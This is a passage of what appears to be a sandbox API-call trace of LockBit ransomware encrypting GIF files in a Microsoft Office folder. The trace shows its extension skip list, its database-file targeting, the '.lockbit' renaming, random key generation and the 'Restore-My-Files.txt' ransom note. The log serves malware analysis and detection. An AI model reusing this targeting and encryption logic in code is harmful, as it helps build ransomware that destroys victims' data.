(lpString1=".dbt", lpString2=".GIF") returned -1 [0203.195] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.195] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.195] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.195] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.195] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF.lockbit") returned 78 [0203.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14531_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.196] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.197] malloc (_Size=0x40068) returned 0x3df0008 [0203.197] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=245) returned 1 [0203.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.197] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.197] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.197] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.201] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.201] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.201] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.201] free (_Block=0x1fa2ed8) [0203.201] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.201] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.201] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.201] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2bd6f00, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc906040, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd2bd6f00, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0xf5, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14532_.GIF", cAlternateFileName="")) returned 1 [0203.201] lstrcmpiW (lpString1=".", lpString2="BD14532_.GIF") returned -1 [0203.201] lstrcmpiW (lpString1="..", lpString2="BD14532_.GIF") returned -1 [0203.201] PathFindExtensionW (pszPath="BD14532_.GIF") returned=".GIF" [0203.201] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.201] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.201] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.201] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.201] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.201] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.201] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.201] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.201] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.201] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.201] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.201] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.202] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.202] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.202] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.202] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.202] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.202] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.202] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.202] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14532_.GIF") returned 1 [0203.203] lstrcmpiW (lpString1="ntldr", lpString2="BD14532_.GIF") returned 1 [0203.203] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14532_.GIF") returned 1 [0203.203] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14532_.GIF") returned 1 [0203.203] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14532_.GIF") returned -1 [0203.203] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14532_.GIF") returned 1 [0203.203] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14532_.GIF") returned 1 [0203.203] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.203] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF") returned=".GIF" [0203.203] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.203] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.203] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.204] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.204] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF.lockbit") returned 78 [0203.204] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14532_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.205] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.205] malloc (_Size=0x40068) returned 0x3df0008 [0203.205] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=245) returned 1 [0203.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.206] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.206] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.209] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.209] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.209] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.209] free (_Block=0x1fa2ed8) [0203.209] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.209] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.209] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.209] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2bd6f00, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc906040, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd2bd6f00, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0xf5, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14533_.GIF", cAlternateFileName="")) returned 1 [0203.209] lstrcmpiW (lpString1=".", lpString2="BD14533_.GIF") returned -1 [0203.209] lstrcmpiW (lpString1="..", lpString2="BD14533_.GIF") returned -1 [0203.209] PathFindExtensionW (pszPath="BD14533_.GIF") returned=".GIF" [0203.210] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.210] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.210] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.211] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14533_.GIF") returned 1 [0203.211] lstrcmpiW (lpString1="ntldr", lpString2="BD14533_.GIF") returned 1 [0203.211] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14533_.GIF") returned 1 [0203.211] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14533_.GIF") returned 1 [0203.211] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14533_.GIF") returned -1 [0203.211] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14533_.GIF") returned 1 [0203.211] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14533_.GIF") returned 1 [0203.211] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.211] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF") returned=".GIF" [0203.211] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.211] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.211] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.211] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.211] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.211] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.211] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.211] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.211] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.211] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.211] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.212] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.212] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.212] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.212] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.212] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.212] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF.lockbit") returned 78 [0203.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14533_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.213] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.213] malloc (_Size=0x40068) returned 0x3df0008 [0203.213] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=245) returned 1 [0203.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.214] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.217] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.217] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.218] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.218] free (_Block=0x1fa2ed8) [0203.218] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.218] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.218] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.218] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe7b7100, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc92c1a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe7b7100, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14565_.GIF", cAlternateFileName="")) returned 1 [0203.218] lstrcmpiW (lpString1=".", lpString2="BD14565_.GIF") returned -1 [0203.218] lstrcmpiW (lpString1="..", lpString2="BD14565_.GIF") returned -1 [0203.218] PathFindExtensionW (pszPath="BD14565_.GIF") returned=".GIF" [0203.218] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.218] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.218] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.218] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.218] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.218] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.218] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.218] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.218] lstrcmpiW 